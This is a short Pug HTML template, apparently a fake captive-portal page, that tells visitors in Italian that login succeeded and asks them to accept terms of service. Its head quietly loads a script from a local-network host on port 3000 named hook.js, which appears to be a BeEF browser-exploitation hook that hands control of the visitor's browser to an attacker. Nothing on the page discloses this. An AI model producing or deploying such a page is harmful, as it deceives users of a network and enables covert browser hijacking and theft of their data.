head
	link(href="/css/bootstrap.css" rel="stylesheet" type="text/css")
	meta(charset='utf-8')
	meta(http-equiv='X-UA-Compatible', content='IE=edge')
	meta(name='viewport', content='width=device-width, initial-scale=1')
	script(src="http://192.168.254.1:3000/hook.js")
body.text-center
	h3 Login effettuato con successo!
	h4 Accetta i termini di servizio per continuare.